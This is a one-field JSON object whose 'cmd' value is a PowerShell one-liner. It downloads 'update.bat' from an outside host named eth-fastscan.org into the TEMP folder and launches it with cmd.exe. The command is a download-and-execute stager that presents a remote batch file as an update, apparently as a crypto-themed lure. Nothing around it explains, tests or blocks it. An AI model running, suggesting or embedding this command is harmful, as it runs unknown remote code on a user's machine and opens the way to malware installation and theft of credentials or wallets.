{
  "cmd": "[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;$u='https://api.eth-fastscan.org/update.bat';$o=Join-Path $env:TEMP 'update.bat';(New-Object Net.WebClient).DownloadFile($u,$o);Start-Process cmd.exe -ArgumentList '/k',$o"
}